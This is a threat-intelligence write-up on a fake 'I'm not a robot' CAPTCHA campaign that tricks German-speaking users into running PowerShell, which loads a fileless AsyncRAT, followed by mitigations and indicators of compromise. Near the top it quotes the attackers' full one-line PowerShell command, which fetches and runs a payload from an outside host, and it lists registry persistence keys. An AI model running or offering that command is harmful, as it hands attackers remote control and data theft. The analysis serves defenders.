Leveraging ‘I’m Not a Robot’ Challenge to Deploy Fileless AsyncRAT via Malicious PowerShell Execution

A sophisticated cyberattack campaign targeting German-speaking users has been discovered, exploiting fake CAPTCHA verification prompts to deploy a fileless variant of AsyncRAT.

The malware operates entirely in memory, evading traditional detection methods while enabling full remote access to compromised systems.

Cyber Kill Chain

Fake CAPTCHA Triggers Malicious PowerShell Execution

The campaign begins on a spoofed “Clickfix” verification page. When users click “Ich bin kein Roboter” (German for “I’m not a robot”), a malicious PowerShell command is copied to their clipboard, accompanied by instructions to execute it via Command Prompt. The command:

powershellconhost.exe --headless powershell -w hidden -nop -c $x = [System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI 'http://namoet[.]de:80/x').Content); cmd /c $x  

• Obfuscation Techniques:
  • Uses conhost.exe (a legitimate Windows console host) to mask PowerShell activity.
  • Leverages PowerShell flags like -w hidden (hidden window) and -nop (no profile loading) to avoid suspicion.
  • Downloads a second-stage payload (x) from namoet[.]de, which decodes to an in-memory .NET loader.

Technical Breakdown: Fileless Persistence and AsyncRAT Payload

The PowerShell payload executes a multi-step fileless attack chain:

1. Persistence Mechanism:
   • Modifies registry keys HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce and HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows to ensure re-execution on reboot.
2. Payload Decoding:
   • Reverses and decodes a fragmented base64 string (=gClRmL0V2btFmbl) to reveal the C2 server address: namoet[.]de:4444.
3. In-Memory .NET Loader:
   • Compiles and executes reversed C# code via Add-Type, establishing a TCP connection to the C2 server. The code enables:
     • Real-time command execution.
     • Credential harvesting.
     • Data exfiltration via input/output redirection.

Attribution to AsyncRAT:

• Matches TTPs like TCP port 4444 for C2, reflective DLL loading, and registry-based persistence.
• Uses PowerShell’s Add-Type to compile malicious code dynamically, a hallmark of AsyncRAT campaigns.

Mitigation Strategies: Combating Fileless Threats

1. Block Suspicious LOLBin Execution:
   • Restrict conhost.exe from launching PowerShell with hidden flags via AppLocker or EDR solutions.
2. Monitor Registry Modifications:
   • Flag unauthorized changes to RunOnce or Windows\win keys.
3. Enforce PowerShell Hardening:
   • Enable Constrained Language Mode and script logging to detect obfuscated commands.
4. Network Traffic Analysis:
   • Block outgoing connections to high-risk ports (e.g., 4444) and known IoCs like namoet[.]de and IP ranges 109.250.108.0/22.

Impact: Compromised systems grant attackers full remote control, enabling data theft, lateral movement, and long-term infiltration all without requiring files to be dropped to disk.

This campaign highlights the growing abuse of legitimate tools (LOLBins) and fileless techniques to bypass defenses. Organizations must prioritize memory scanning, behavioral analysis, and proactive threat-hunting to counter such evolving threats.

IOCs

Indicator Type	Value	Use
IP	109.250.111[.]155	Clickfix Delivery
FQDN	namoet[.]de	Clickfix / Command & Control server
Port	4444	TCP reverse shell listener port
URL	hxxp[:]//namoet[.]de:80/x	PowerShell payload
Registry (HKCU)	SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windows	RunOnce key ensures persistence on next boot
Registry (HKCU)	SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\win	Windows\win holds obfuscated PowerShell command